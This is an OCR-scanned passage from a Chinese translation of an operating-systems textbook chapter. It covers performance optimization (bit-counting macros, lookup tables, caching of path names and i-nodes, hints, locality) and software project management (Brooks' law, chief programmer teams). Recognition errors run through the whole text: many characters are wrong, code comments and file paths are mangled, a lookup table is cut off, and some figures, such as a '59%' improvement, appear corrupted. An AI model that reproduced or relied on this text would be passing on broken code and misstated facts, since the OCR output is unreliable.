Vista 尽 管 运 行 在 快 1000 倍 的 硬件 上 ， 可 能 要 花费 几 分 钟 才能 启动 。 原 
因 是 它们 要 做 更 多 的 事情 ， 有 用 的 或 无 用 的 。 看 一 个 相关 的 案例 。 即 
插 即 用 使 得 安装 一 个 新 的 硬件 设备 相当 容易 ， 但 是 付出 的 代价 是 在 每 
次 启动 时 ， 操 作 系 统 都 必须 要 检查 所 有 的 硬件 以 了 解 是 否 存 在 新 的 设 
备 。 这 一 总 线 扫描 是 要 花 时 间 的 。 


一 种 替代 的 (并 且 依 作者 看 来 是 更 好 的 ) 方法 是 完全 抛弃 即 插 即 
Al, 并且 在 屏幕 上 包含 一 个 图 标 标 明 “ 安 狠 新 硬件 *”。 当 安 洲 一 个 新 的 
硬件 设备 时 ， 用 户 可 以 点 击 图 标 开 始 尽 线 扫描 ， 而 不 是 在 每 次 局 动 的 
时 候 做 这 件 事情 。 当 然 ， 当 今 的 系统 设计 人 员 是 完全 知道 这 一 选择 
的 。 但 是 他 们 拒绝 这 一 选择 ， 主 要 是 因为 他 们 假设 用 户 太 过 和 思 答 而 不 
能 正确 地 做 这 件 事 情 \ 尽 管 他 们 使 用 了 更 加 友好 的 措辞 ) 。 这 只 是 一 
个 例子 ， 但 是 还 存在 更 多 的 事例 ， 期 望 让 系统 “用 户 友好 ” REDA 
瓜 ”， 取 决 于 你 的 看 法 ) 却 使 系统 始终 对 所 有 用 户 是 缓慢 的 。 


或 许 系统 设计 人 员 为 改进 性 能 可 以 做 的 最 大 的 一 件 事 情 ， 有 是 对 于 
添加 新 的 功能 特性 更 加 具有 选择 性 。 要 问 的 问题 不 是 “用 户 会 喜欢 
吗 ? ”而 是 “这 一 功能 特性 按照 代码 大 小 、 速 度 、 复 如 性 和 可 靠 性 值得 
不 计 代价 蚂 ? ”只 有 当 优 点 明显 地 超过 缺点 的 时 候 ， 它 才 应 该 被 包括 。 
程序 员 倾 向 于 假设 代码 大 小 和 程序 错误 计数 为 0 并 且 速 度 为 无 穷 大 。 经 
验 表 明 这 种 观点 有 些 过 于 乐观 。 


另 一 个 重要 因素 是 产品 的 市 场 销售 。 到 某 件 产 品 的 第 4 或 第 5 版 上 
市 的 时 候 ， 真 正 有 用 的 所 有 功能 特性 或 许 已 经 全 部 包括 了 ， 并 且 需 要 
该 产品 的 大 多 数 人 已 经 拥有 它 了 。 为 了 保持 销售 ， 许 多 生产 商 仍然 继 
续 生 产 新 的 版 本 ， 具 有 更 多 的 功能 特性 ， 正 是 这 样 才 可 以 癌 现 有 的 顾 
客 出 售 升级 版 。 只 是 为 了 添加 新 的 功能 特性 而 添加 新 的 功能 特性 可 能 
有 助 于 销售 ， 但 是 很 少 会 有 助 于 性 能 。 


13.4.2 ”什么 应 该 优化 


作为 一 般 的 规则 ， 系 统 的 第 一 版 应 该 尽 可 能 简单 明了 。 惟 一 的 优 
化 应 该 是 那些 显而易见 要 成 为 不 可 避免 的 问题 的 事情 。 为 文件 系统 提 
供 块 高 速 缓存 束 是 这 样 的 一 个 例 了 于 。 一 旦 系统 引导 起 来 并 运行 ， 束 应 
该 仔细 地 测量 以 了 解 时 间 真 正 伦 在 了 什么 地 方 。 基 于 这 些 数字 ， 应 该 
在 最 有 帮助 的 地 方 做 出 优化 。 


这 里 有 一 个 关于 优化 不 但 不 好 反而 更 坏 的 真实 故事 。 作 者 的 一 名 
学 生 编 写 了 MINIX 的 mkfs 程 序 。 该 程序 在 一 个 新 格式 化 的 磁 副 上 布下 
一 个 新 的 文件 系统 。 这 名 学 生花 了 大 约 6 个 月 的 时 间 对 其 进行 优化 ， 包 
括 放 入 磁盘 高 速 缓存 。 当 他 上 区 该 程序 时 ， 写 不 能 工作 ， 需 要 另外 几 
个 月 进行 调试 。 在 计算 机 的 生命 周期 中 ， 当 系统 安 逆 时 ， 该 程序 典型 
地 在 硬盘 上 运行 一 次 。 它 还 对 每 块 做 格式 化 的 软盘 运行 一 次 。 每 次 运 
行 大 约 耗 时 2 秒 。 即 使 未 优化 的 版 本 耗 时 1 分 钟 ， 花 费 如 此 多 的 时 间 优 
化 一 个 很 少 使 用 的 程序 也 是 相当 不 值 的 。 


对 于 性 能 优化 ， 一 条 相当 适用 的 口号 是 


足够 好 束 够 好 了 。 


通过 这 条 口号 我 们 要 表达 的 意思 是 : 性 能 一 旦 达到 一 个 合理 的 水 
平 ， 榨 出 最 后 一 点 百分比 的 努力 和 复杂 性 或 许 并 不 值得 。 如 果 调 度 算 


法 相当 公平 并 且 在 90% 的 时 间 保 持 CPU 忙 碌 ， 它 殉 尽 到 了 目 己 的 职 
责 。 发 明 一 个 改进 了 59% 但 是 要 复杂 得 多 的 算法 或 许 是 一 个 坏 主 意 。 类 


似 地 ， 如 果 缺 页 率 足 够 低 到 不 是 瓶颈 ， 克 服 重 重 难关 以 获得 优化 的 性 
能 通常 并 不 值得 。 避 人 免 灾难 比 获 得 优化 的 性 能 要 重要 得 多 ， 特 别 是 针 
对 一 种 负载 的 优化 对 于 另 一 种 负载 可 能 并 非 优 化 的 情况 。 


13.4.3 ”空间 -时 间 的 权衡 


改进 性 能 的 一 种 一 般 性 的 方法 十 权衡 时 间 与 空间 。 在 一 个 使 用 很 
少 内 存 但 是 速度 比较 慢 的 算法 与 一 个 使 用 很 多 内 存 但 是 速度 更 快 的 算 
法 之 间 进 行 选 择 ， 这 在 计算 机 科学 中 是 经 利 发 生 的 事情 。 在 做 出 重要 
的 优化 时 ， 值 得 寻找 通过 使 用 更 多 内 存 加 快 了 速度 的 算法 ， 或 者 反 过 
来 通过 做 更 多 的 计算 下 省 了 至 贯 的 内 存 的 算法 。 


一 种 第 用 而 有 益 的 技术 是 用 宏 来 代替 小 的 过 程 。 使 用 宏 消 除了 通 
党 与 过 程 调用 相关 联 的 开销 。 如 末 调 用 出 现在 一 个 循环 的 内 部 ， 这 种 
获 丛 尤其 显著 。 例 如， 假设 我 们 使 用 位 图 来 跟踪 资源 ， 并 且 经 党 需要 
了 解 在 位 图 的 某 一 部 分 中 有 多 少 个 单元 是 空 采 的 。 为 此 ， 我 们 需要 一 
个 过 程 bit_count 来 计数 一 个 字 市 中 值 为 1 的 位 的 个 数 。 图 13-7a 中 给 出 了 
人 简单 明了 的 过 程 。 它 对 一 个 字 市 中 的 各 个 位 循环 ， 每 次 计数 它们 一 


次 。 


#define BYTE_SIZE 8 /# 一 个 字 节 包含 8 个 位 */ 
int bit_count(int byte) f EENEI 
{ /* 对 一 个 字 节 中 的 位 进行 计数 */ 


int i, count = 0; 

for (i = 0; i< BYTE_SIZE; i++) P® 对 一 个 字 节 中 的 各 个 位 循环 */ 
if ((byte >> i) & 1) count++; /* 如 果 该 位 是 1， 计 数 加 1 */ 

return(count); /* J&B] AM */ 


上 将 一 个 字 节 中 的 位 相 加 并 且 返 回 和 的 宏 */ 
#define bit_count(b)((b&1) + ((b>>1)&1) + ((b>>2)&1) + ((b>>3)&1) +\ 
((b>>4)&1) + ((b>>5)&1) + ((b>>6)&1) + ((b>>7)&1)) 


I 在 一 个 表 中 查找 位 计数 的 宏 */ 
char bits[256] = {0, 1, 1, 2, 1, 2,2, 3,1,2, 2, 3,2, 3, 3, 4, 1, 2, 2; 3, 2,3,3, -X 
#define bit_count(b) (int) bits[b] 


c) 


图 13-7 a) 对 一 个 字 节 中 的 位 进行 计数 的 过 程 ，b) 对 位 进行 计数 的 
B: 在 表 中 查找 位 计数 


该 过 程 有 两 个 低 效 的 根源 。 自 先 ， 它 必须 说 调用， 必须 为 它 分 配 
栈 空 间 ， 并 且 必 须 返 回 。 每 个 过 程 调用 都 有 这 个 开销 。 age 
一 个 循环 ， 并 且 总 是 存在 与 循环 相关 联 的 某 些 开 销 。 


一 种 完全 不 同 的 方法 是 使 用 图 13-7b 中 的 宏 。 这 个 宏 是 一 个 内 联 表 

达 式 ， 它 通过 对 参数 连续 地 移 位 ， 屏 蔽 除 低 位 以 外 的 其 他 位 ， 并 且 将 8 
个 项 相 加 ， 这 样 来 计算 位 的 和 。 这 个 宏 决 不 是 一 件 艺 术 作品 ， 但 是 

只 在 代码 中 出 现 一 次 。 当 这 个 安 被 调用 时 ， 例 如 通 


sum=bit_count(table[i]); 


这 个 安 调 用 看 起 来 气 过 程 调用 等 同 。 因 此 ， 除 了 定义 有 一 点 次 瑟 
以 外 ， 宏 中 的 代码 看 上 去 并 不 比 过 程 中 的 代码 要 差 ， 但 是 它 的 效率 更 
高 ， 因 为 它 消 除了 过 程 调用 的 开销 和 循环 的 开销 。 


我 们 可 以 更 进一步 研究 这 个 例子 。 究 竞 为 什么 计算 位 计数 ? 为 什 
么 不 在 一 个 表 中 查找 ? 毕竟 只 有 256 个 不 同 的 字 世 ， 每 个 字 节 具有 0 到 8 
之 间 的 惟一 的 值 。 我 们 可 以 声明 一 个 256 项 的 表 bits， 每 一 项 (在 编译 
时 ) 初始 化 成 对 应 于 该 字 节 值 的 位 计数 。 采 用 这 一 方法 在 运行 时 根本 
号 不 需要 计算 ， 只 要 一 个 变 址 操作 束 可 以 了 。 图 13-7c 中 给 出 了 做 这 一 
工作 的 宏 。 


这 征用 内 存 换取 计算 时 间 的 明显 的 例子 。 然 而 ， 我 们 还 可 以 再 进 
一 步 。 如 果 需 要 整个 32 位 字 的 位 计数 ， 使 用 我 们 的 bit_count 宏 ， 每 个 字 
我 们 需要 执行 四 次 查找 。 如 有 果 将 表 扩 展 到 65 536 项 ， 每 个 字 查 找 两 次 就 
足够 了 ， 代 价 是 更 大 的 表 。 


在 表 中 查找 答案 可 以 用 在 其 他 方面 。 例 如 ， 在 第 7 章 中 ， 我 们 看 到 

了 JPEG 图 像 压 缩 是 怎样 工作 的 ， 它 使 用 了 相当 复杂 的 离散 余弦 变换 。 
太一 种 压缩 拉 术 GIF 使 用 表 查 找 玉 编码 24 们 RGB 图 像 。 然 而 ，GIF 只 对 
具有 256 种 颜色 或 更 少 颜色 的 图 像 起 作用 。 对 于 每 幅 要 压缩 的 图 像 ， 构 
造 一 个 256 项 的 调 色 板 ， 每 一 项 包含 一 个 24 位 的 RGB 值 。 压 缩 过 的 图 像 
于 是 包含 每 个 像素 的 8 位 索引 ， 而 不 是 24 位 颜色 值 ， 增 葵 因 子 为 3° 图 


13-8 中 针对 一 幅 图 像 的 一 个 4x4 区 域 说 明了 这 一 思想 。 原 始 未 压缩 的 图 
像 如 岁 13-8a 所 示 ， 该 图 中 每 个 取 值 是 一 个 24 位 的 值 ， 每 8 位 给 出 红 、 绿 
和 蓝 的 强度 。GIF 图 像 如 图 13-8b 所 示 ， 该 图 中 每 个 取 值 是 一 个 进入 调 
色 板 的 8 位 索引 。 调 色 板 作为 图 像 文 件 的 一 部 分 存放 ， 如 图 13-8c 所 示 。 
实际 上 ，GIF 算 法 的 内 容 比 这 要 多 ， 但 是 思想 的 核心 是 才 碍 找 。 


a) b) c) 


图 13-8 al) 每 个 像素 24 位 的 未 压缩 图 像 的 局 部 ，b) 以 GIF 压缩 的 相同 
局 部 ， 每 个 像素 8 位 ;，@ 调 色 板 


存在 减少 图 像 大 小 的 另 一 种 方法 ， 并 且 这 种 方法 说 明了 一 种 不 同 
的 权衡 。PostScript 是 一 种 程序 设计 语言 ， 可 以 用 来 描述 图 像 。 (实际 
上 上， 任何 程序 设计 语言 都 可 以 描述 图 像 ， 但 是 PostScript 专 为 这 一 目的 
进行 了 调节 。) 许多 打印 机 具有 内 骨 的 PostScript 解 释 器 ， 能 够 运行 发 
送 给 它们 的 PostScript 程 序 。 


A, WARE MARE MEARS A ee 
用 于 该 图 像 的 PostScript 程 序 将 携带 指令 ， 用 来 将 一 个 矩形 放置 在 一 定 
的 位 置 并 且 用 一 定 的 颜色 填充 该 矩形 。 只 需要 少数 几 个 位 束 可 以 发 出 
此 命令 。 当 打印 机 接收 图 像 时 ， 打 印 机 中 的 解释 器 必须 运行 程序 才能 
绘制 出 图 像 。 因此 ，PostScript 以 更 多 的 计算 为 代价 实现 了 数据 压缩 ， 
这 是 与 表 查 找 不 同 的 一 种 权衡 ， 但 是 当 内 存 或 带 视 不 足 时 是 硕 有 价值 
的 。 


其 他 的 权衡 经 常 率 涉 数据 结构 。 双 向 链表 比 单 向 链表 占据 更 多 的 
内 存 ， 但 是 经 常 使 得 访问 表 项 速度 更 快 。 散 列表 甚至 更 浪费 空间 ， 但 
征 要 更 快 。 简 而 言 之 ， 当 优化 一 段 代 码 时 要 考虑 的 重要 事情 之 一 二 : 
使 用 不 同 的 数据 结构 是 否 将 产生 最 佳 的 时 间 - 空 间 平 衡 。 


13.4.4 高速 缓存 


用 于 改进 性 能 的 一 种 众所周知 的 技术 十 高 速 缓存 。 在 任何 相同 的 
结 打 可 能 需要 多 次 的 情况 下 ， 高 速 缓存 都 是 适用 的 。 一 般 的 方法 是 诈 
先 做 完整 的 工作 ， 然 后 将 结 末 保存 在 高 速 缓存 中 。 对 于 后 来 的 符 试 ， 
目 先 要 检查 高 速 级 存 。 如 果 结 果 在 高 速 级 存 中 ， 束 使 用 它 。 否 则 ， 再 
做 完整 的 工作 。 


我 们 已 经 看 到 高 速 缓存 在 文件 系统 内 部 的 运用 ， 在 高 速 缓存 中 保 
存 一 定数 目 最 近 用 过 的 磁 玛 块 ， 这 样 在 每 次 命中 时 天 可 以 省 略 磁 到 读 
操作 。 然 而 ， 高 速 缓存 还 可 以 用 于 许多 其 他 目的 。 例 如 ， 解 析 路 径 名 
忠 代 价 高 郧 得 令 人 吃惊 。 再 次 考虑 图 4-35 中 UNIX 的 例子 。 为 了 查 
找 /usrasVmbox， 和 需要 如 下 的 磁盘 访问 : 


1) 读 入 根 目录 的 i 节点 (i 节点 1) 。 
2) 读 入 根 目录 (磁盘 块 1) 。 

3) 读 入 musr 的 诈 点 《im 点 6) ° 
4) 读 入 /usr 目 录 (磁盘 块 132) 。 


5) 读 入 /usrast 的 i 贡 点 (i 节点 26) 


6) 读 入 /usrast 目 孙 〈 人 磁盘 块 406) 。 


只 是 为 了 获得 文件 的 iT 点 号 了 藉 需要 6 次 磁盘 访问 。 然 后 必须 读 入 i 
点 本 身 以 获得 磁盘 块 号 。 如 果 文 件 小 于 块 的 大 小 〈 例 如 1024 字 


$ 
W) ， 那 么 需要 8 次 磁盘 访问 才 读 到 数据 。 


某 些 系统 通过 对 (路 径 ，i 节 点 ) 的 组 合 进行 高 速 缓存 来 优化 路 径 
名 的 解析 。 对 于 图 4-35 的 例子 ， 在 解析 /usr/ast/mbox 之 后 ， 高 速 绥 存 中 
肯定 会 保存 图 13-9 的 前 三 项 。 最 后 三 项 来 目 解 析 其 他 路 径 。 


husr | e 
/usr/ast/mbox 60 
lusrlastbooks | 92 


justbal — E 
/usr/bal/paper.ps 


13-9 图 4-35 的 证 点 高 速 缓存 的 局 部 


当 必 须 查找 一 个 路 径 时 ， 名 字 解 析 器 首先 查阅 高 速 缓存 并 搜索 它 
以 找到 高 速 缓存 中 存在 的 最 长 的 子 字符 串 。 例 如 ， 如 果 存 在 路 
径 /usrastgrants/stw， 高 速 缓存 会 返回 /usrast 是 市 点 26 这 样 的 事实 ， 
这 样 搜索 就 可 以 从 这 里 开始 ， 消 除了 四 次 磁盘 访问 。 


对 路 径 进行 高 速 缓存 存在 的 一 个 问题 是 ， 文 件 名 与 点 号 之 间 的 
映射 并 不 总 是 固定 的 。 假 设 文件 /usrastmbox 从 系统 中 被 删除 ， 并 且 其 
i 玉 点 重用 于 不 同 用 户 所 拥有 的 不 同 的 文件 。 随 后 ， 文 件 /usrasUVmbox 
再 次 被 创建 ， 并 且 这 一 次 它 得 到 i 和 点 106。 如 有 宁 不 对 这 件 事情 进行 预 
防 ， 高 速 缓存 项 现在 将 是 错误 的 ， 并 且 后 来 的 查找 将 返回 错误 的 i 点 
号 。 为 此 ， 当 一 个 文件 或 目录 被 删除 时 ， 它 的 高 速 缓存 项 以 及 (如 果 
它 是 一 个 目录 的 话 ) 它 下 面 所 有 的 项 都 必须 从 高 速 缓存 中 清除 。 


傍 盘 块 与 路 径 名 并 不 是 能 够 高 速 缓存 的 惟一 项 目 ，i7 点 也 可 以 被 
高 速 缓存 。 如 果 弹 出 的 线程 用 来 处 理 中 断 ， 每 个 这 样 的 线程 需要 一 个 
栈 和 某 些 附加 的 机 构 。 这 些 以 前 用 过 的 线程 也 可 以 被 高 速 缓存 ， 因 为 
刷新 一 个 用 过 的 线程 比 从 头 创建 一 个 新 的 线程 更 加 容易 〈 为 了 避免 必 
须 分 配 内 存 ) 。 难 于 生产 的 任何 事物 几乎 都 能 够 被 高 速 缓存 。 


13.4.5 ”线索 


高 速 缓存 项 总 是 正确 的 。 高 速 缓存 搜索 可 能 失败 ， 但 是 如 采 找 到 
了 一 项 ， 那 么 这 一 项 保证 是 正确 的 并 且 无 需 再 费 周折 就 可 以 使 用 。 在 
某 些 系统 中 ， 包 含 线索 (hint) 的 表 是 十 分 便利 的 。 这 些 线索 是 关于 
答案 的 暗示 ， 但 是 它们 并 不 你 证 是 正确 的 。 调 用 者 必须 目 行 对 结 采 进 


行 验证 。 


众所周知 的 天 于 线索 的 例子 是 牛 在 Web 页 上 的 URL。 点 击 一 个 链 
接 并 不 能 保证 修 指 疝 的 Web 页 束 在 那里 。 事 实 上 ， 伞 指向 的 网 页 可 能 
10 年 前 就 被 删除 了 。 因 此 包含 URL 的 网 页 上 面 的 信息 只 是 一 个 线索 。 


线索 还 用 于 连接 远程 文件 。 信 息 是 提示 有 关 远 程 文件 某 些 事项 的 
线索 ， 例 如 文件 存放 的 位 置 。 然 而 ， 目 该 线索 被 记录 以 来 ， 文 件 可 能 
已 经 说 移动 或 者 说 删除 了 ， 所 以 为 了 明确 线索 是 否 正 确 ， 辟 古 需 要 进 


行 检 查 。 


13.4.6 ”利用 局 部 性 


进程 和 程序 的 行为 并 不 是 随机 的 ， 它 们 在 时 间 上 和 空间 上 展现 出 
相当 程度 的 局 部 性 ， 并 且 可 以 以 各 种 方式 利用 该 信息 来 改进 性 能 。 空 
间 局 部 性 的 一 个 音 见 例子 是 这 样 的 事实 : 进程 并 不 是 在 其 地 址 空间 内 
部 随机 地 到 处 跳 转 的 。 在 一 个 给 定 的 时 间 间 隔 内 ， 它 们 倾 辐 于 使 用 数 
目 比 较 少 的 页 面 。 进 程 正在 有 效 地 使 用 的 页 面 可 以 被 标记 为 它 的 工作 
集 ， 并 且 操 作 系统 能 够 确保 当 进程 彼 人 允许 运行 时 ， 它 的 工作 集 在 内 存 
中 ， 这 样 束 减少 了 忠 页 的 次 数 。 


局 部 化 原理 对 于 文件 也 是 成 立 的 。 当 一 个 进程 选择 了 一 个 特定 的 
工作 目录 时 ,很 可 能 将 来 许多 文件 引用 将 指向 该 目录 中 的 文件 。 通 过 
在 磁盘 上 将 每 个 目录 的 所 有 i 节点 和 文件 束 近 放 在 一 起 ， 可 能 会 获得 性 
能 的 改善 。 这 一 原理 正 是 Berkeley 快 速 文 件 系 统 的 基础 (McKusick 等 
A, 1984) ° 
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后 一 次 用 过 的 CPU 上 运行 每 个 线程 ， 期 望 它 的 某 些 内 存 块 依然 还 在 内 
存 的 高 速 缓存 中 。 


13.4.7 ”优化 常见 的 情况 


区 分 最 常见 的 情况 和 最 坏 可 能 的 情况 并 且 分 别处 理 它 们 ， 这 通常 
征 一 个 好 主意 。 针 对 这 两 者 的 代码 前 稍 是 相当 不 同 的 。 重 要 的 征 要 使 
常见 的 情况 速度 快 。 对 于 最 坏 的 情况 ， 如 末 它 很 少 发 生 ， 使 其 正确 束 
ET ° 


第 一 个 例子 ， 考 处 进入 一 个 临界 区 。 在 大 多 数 时 间 中 ， 进 入 将 是 
成 功 的 ， 特 别 是 如 果 进 程 在 临界 区 内 部 不 花费 很 多 时 间 的 话 。 
Windows Vista 提 供 的 一 个 Win32 API 调 用 EnterCriticalSection 就 利用 了 
这 一 期 望 ， 它 自动 地 在 用 户 态 测试 一 个 标志 (使 用 TSL 或 等 价 物 ) 。 
如 果 测 试 成 功 ， 进 程 只 是 进入 临界 区 并 且 不 需要 内 核 调 用 。 如 果 测 试 
失败 ， 库 过 程 将 调用 一 个 信号 量 上 的 down 操 作 以 阻塞 进程 。 因 此 ， 在 
通常 情况 下 是 不 需要 内 核 调用 的 。 


第 二 个 例 于 ， 考 虑 设置 一 个 警报 〈 在 UNIX 中 使 用 信号 ) 。 如 采 当 
前 没有 警报 等 完成 ， 那 么 构造 一 个 警报 并 且 将 其 放 在 定时 右 队 列 上 厦 
很 简单 的 。 然 而 ， 如 有 果 已 经 有 一 个 警报 竺 完成 ， 那 么 就 必须 找到 它 并 
且 从 定时 器 队列 中 删除 。 由 于 alarm 调 用 并 未 指明 是 否 已 经 设置 了 一 个 
警报 ， 所 以 系统 必须 假设 最 坏 的 情况 ， 即 有 一 个 警报 。 然 而 ， 由 于 大 


多 数 时 间 不 存在 警报 竺 完成， 并 且 由 于 删除 一 个 现 有 的 警报 代价 高 
， 所 以 区 分 这 两 种 情况 是 一 个 好 主意 。 


a 


做 这 件 事情 的 一 种 方法 是 在 进程 表 中 保留 一 个 位 ， 表 明 是 否 有 一 
个 警报 待 完 成。 如 果 这 一 位 为 0， 就 好 办 了 (只 是 添加 一 个 新 的 定时 器 
队列 项 而 无 须 检 查 ) 。 如 果 该 位 为 1， 则 必须 检查 定时 器 队列 。 


13.5 ”项 目 管理 


程序 员 是 天 生 的 乐观 主义 者 。 他 们 中 的 大 多 数 认为 编写 程序 的 方 
式 束 是 急切 地 奔 疝 键盘 并 且 开 始 击 键 ， 不 久 以 后 完全 调试 好 的 程序 就 
完成 了 。 对 于 非常 大 型 的 程序 ， 事 实 并 非 如 此 。 在 下 面 儿 季 ， 关 于 管 
理 大 型 软件 项 目 ， 特 别 是 大 型 操作 系统 项 目 ， 我 们 有 一 些 看 法 要 陈 
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13.5.1 人 月 神话 


经 典 著作 《人 月 神话 》 的 作者 Fred Brooks 是 OS/360 的 设计 者 之 

一 ， 他 后 来 转向 了 学 术 界 。 在 这 部 经 典 著 作 中 ，Fred Brooks 讨 论 了 建 
造 大 型 操作 系统 为 什么 如 此 艰难 的 问题 (Brooks,1975,1995) 。 当 大 多 
数 程序 员 看 到 他 声称 程序 员 在 大 型 项 目 中 每 年 只 能 产 出 1000 行 调试 好 
的 代码 时 ， 他 们 怀疑 Brooks 教 授 是 否 生活 在 外 层 空 间 ， 或 许 是 在 具 虫 
Æ (Planet Bug 一 一 此 处 Bug 为 双关 语 ) 上 。 上 毕竟， 他 们 中 的 大 多 数 在 
熬夜 的 时 候 一 个 晚上 就 可 以 产 出 1000 行 程序 。 这 怎么 可 能 是 任何 一 个 
IQ 大 于 50 的 人 一 年 的 产 出 呢 ? 


Brooks 指 出 的 是 ， 具 有 几 百 名 程序 员 的 大 型 项 目 完 全 不 同 于 小 型 
项 目 ， 并 且 从 小 型 项 目 获得 的 结果 并 不 能 放大 到 大 型 项 目 。 在 一 个 大 


型 项 目 中 ， 甚 至 在 编码 开始 之 前 ， 大 量 的 时 间 束 消耗 在 规划 如 何 将 工 
作 划 分 成 模块 、 仔 细 地 说 明 模 块 及 其 接口 ， 以 及 试图 设想 模块 将 怎样 
互相 作用 这 样 的 事情 上 。 人 然后， 模块 必 须 独 立地 编码 和 调试 。 最 后 ， 
模块 必须 集成 起 来 并 且 必 须 将 系统 作为 一 个 整体 来 测试 。 通 常 的 情况 
征 ， 每 个 模块 单独 测试 时 工作 得 十 分 完美 ， 但 是 当 所 有 部 分 集成 在 一 
起 上 时， 系统 立刻 崩 演 。Brooks 将 工作 量 估 计 如 下 : 


.1/3 规划 


.1/6 编码 


:1/4 模 块 测试 


.1/4 系统 测试 


换言之 ， 编 写 代 码 是 容易 的 部 分 ， 困 难 的 部 分 是 断定 应 该 有 哪些 
模块 并 且 使 模块 A 与 模块 B 正 确 地 交互 。 在 由 一 名 程序 员 编 写 的 小 型 程 
序 中 ， 留 竺 处 理 的 所 有 部 分 都 是 简单 的 部 分 。 


Brooks 的 书 的 标题 来 目 他 的 断言 ， 即 人 与 时 间 是 不 可 互 换 的 。 不 
存在 “人 月 "这样 的 单位 。 如 果 一 个 项 目 需要 15 个 人 花 2 年 时 间 构 建 ， 很 
难 想像 360 个 人 能 够 在 1 个 月 内 构建 它 ， 甚 至 让 60 个 人 在 6 个 月 内 做 出 它 
或 许 也 是 不 可 能 的 。 


产生 这 一 效应 有 三 个 原因 。 第 一 ， 工 作 不 可 能 完全 并 行 化 。 直 到 
完成 规划 并 且 确 定 了 需要 哪些 模块 以 及 它们 的 接口 ， 甚 至 都 不 能 开始 
编码 。 对 于 一 个 2 年 的 项 目 ， 仪 仅 规划 可 能 束 要 人 花费 8 个 月 。 


第 二 ， 为 了 完全 利用 数目 众多 的 程序 员 ， 工 作 必 须 划分 成 数目 众 
多 的 模块 ， 这 样 每 个 人 才能 有 事情 做 。 由 于 每 个 模块 可 能 潜在 地 与 
个 其 他 模块 相互 作用 ， 需 要 将 模块 -模块 相互 作用 的 数目 看 成 随 着 模块 
数目 的 平方 而 增长 ， 也 就 是 说 ， 随 着 程序 员 数 目的 平方 而 增长 。 这 一 
复杂 性 很 快 就 会 失去 控制 。 对 于 大 型 项 目 而 言 ， 人 与 月 之 间 的 权衡 远 
不 是 线性 的 ， 对 63 个 软件 项 目 精 细 的 测量 证 实 了 这 一 点 

(Boehm,1981) ° 


第 三 ， 调 试 工作 是 高 度 序列 化 的 。 对 于 一 个 问题 ， 安 排 10 名 调试 
人 员 并 不 会 加 快 10 倍 发 现 程序 错误 。 事 实 上 ，10 和 名 调试 人 员 或 许 比 一 
名 调试 人 员 还 要 慢 ， 因 为 他 们 在 相互 沟通 上 要 浪费 太 多 的 时 间 。 


对 于 人 员 与 时 间 的 权衡 ，Brooks 将 他 的 经 验 总 结 在 Brooks 定 律 


对 于 一 个 延期 的 软件 项 目 ， 增 加 入 力 将 使 它 更 加 延期 。 


增加 入 员 的 问题 在 于 他 们 必须 在 项 目 中 获得 培训 ， 模 块 必须 重新 
划分 以 便 与 现在 可 用 的 更 多 数目 的 程序 员 相 匹配 ， 需 要 开 许 多 会 议 来 


协调 各 方面 的 努力 等 。Abdel-Hamid 和 Madnick (1991) 用 实验 方法 证 
实 了 这 一 定律 。 用 稍稍 不 敬 的 方法 重 述 Brooks 定 律 就 是 : 


无 论 分 配 多 少妇 女 从 事 这 一 工作 ， 生 一 个 孩子 都 需要 9 个 月 。 


13.5.2 ”团队 结构 


商业 操作 系统 是 大 型 的 软件 项 目 ， 总 是 需要 大 型 的 人 员 团 队 。 人 
员 的 质量 极为 重要 。 几 十 年 来 人 们 已 经 众所周知 的 是 ， 顶 尖 的 程序 员 
比 拙 劣 的 程序 员 和 生产率 要 高 出 10 倍 (Sackman 等 人 ，1968) ° MWE 
于 ， 当 你 需要 200 名 程序 员 时 ， 找 到 200 名 顶尖 的 程序 员 非 常 困 难 ， 对 
于 程序 员 的 质量 你 不 得 不 有 所 将 就 。 


在 任何 大 型 的 设计 项 目 (软件 或 其 他 ) 中 ， 同 样 重要 的 是 需要 体 
系 结构 的 一 怪 性 。 应 该 有 一 名 才 乔 超群 的 人 对 设计 进行 控制 。Brooks 
引证 兰 斯 大 教堂 趾 作 为 大 型 项 目的 例子 ， 兰 斯 大 教堂 的 建造 伦 费 了 几 
十 年 的 时 间 ， 在 这 一 过 程 中 ， 后 来 的 建筑 师 完全 服从 于 完成 最 初 风格 
的 建筑 师 的 规划 。 结 果 是 其 他 欧洲 大 教堂 无 可 比拟 的 建筑 结构 的 一 致 
PE ° 


在 20 世 纪 70 年 代 ，Harlan Mills 把 “一 些 程序 员 比 其 他 程序 员 要 好 很 
多 ”的 观察 结果 与 对 体系 结构 一 致 性 的 需要 相 结 合 ， 提 出 了 首席 程序 员 
团队 (chief programmer team) 的 范式 (Baker,1972) 。 他 的 思想 是 要 
像 一 个 外 科 手 术 团 队 ， 而 不 是 像 一 个 杀 猪 屠夫 团队 那样 组 织 一 个 程序 
员 团 队 。 不 是 每 个 人 像 疯 子 一 样 乱 砍 一 气 ， 而 是 由 一 个 人 掌握 着 手术 
刀 ， 其 他 人 在 那里 提供 文 持 。 对 于 一 个 10 名 人 员 的 项 目 ，Mills 建 议 的 
团队 结构 如 图 13-10 所 示 。 


职 ” 责 
执行 体系 结构 设计 并 编写 代码 

辅助 首席 程序 员 并 为 其 提供 咨询 

管理 人 员 、 预 算 、 空 间 、 设 备 、 报 告 等 
编辑 文档 ， 而 文档 必须 由 首席 程序 员 编写 
行政 主管 和 编辑 各 需要 一 名 秘书 
维护 代码 和 文档 档案 


首席 程序 员 
副手 


FE 


[有 具 师 提供 首席 程序 员 需 要 的 任何 工具 
测试 员 测试 首席 程序 员 的 代码 


语言 律师 兼职 人 员 ， 他 可 以 就 语言 向 首席 程序 员 提供 建议 


图 13-10 Mills 建 议 的 10 人 首席 程序 员 团 队 的 分 工 


自从 提出 这 一 建议 并 付 诸 实 施 ，30 年 过 去 了 。 一 些 事情 已 经 变化 
(例如 需要 一 个 语言 层 一 一 C 比 PL/I 更 为 简单 ) ， 但 是 只 需要 一 名 才智 
超群 的 人 员 对 设计 进行 控制 仍然 古 正 确 的 。 并 且 这 名 才智 超群 着 在 设 
计 和 编程 上 应 该 能 够 100% 地 起 作用 ， 因 此 需要 支持 人 员 。 尽 管 借助 于 
计算 机 的 帮助 ， 现 在 一 个 更 小 的 文 持 人 员 队 伍 束 足够 了 。 但 是 在 本 质 
上 ， 这 一 思想 仍然 是 有 效 的 。 


任何 大 型 项 目 都 需要 组 织 成 层次 结构 。 抵 层 是 许多 小 的 团队 ， 每 
个 团队 由 首席 程序 员 领 导 。 在 下 一 层 ， 必 须 由 一 名 经 理 人 对 一 组 团队 
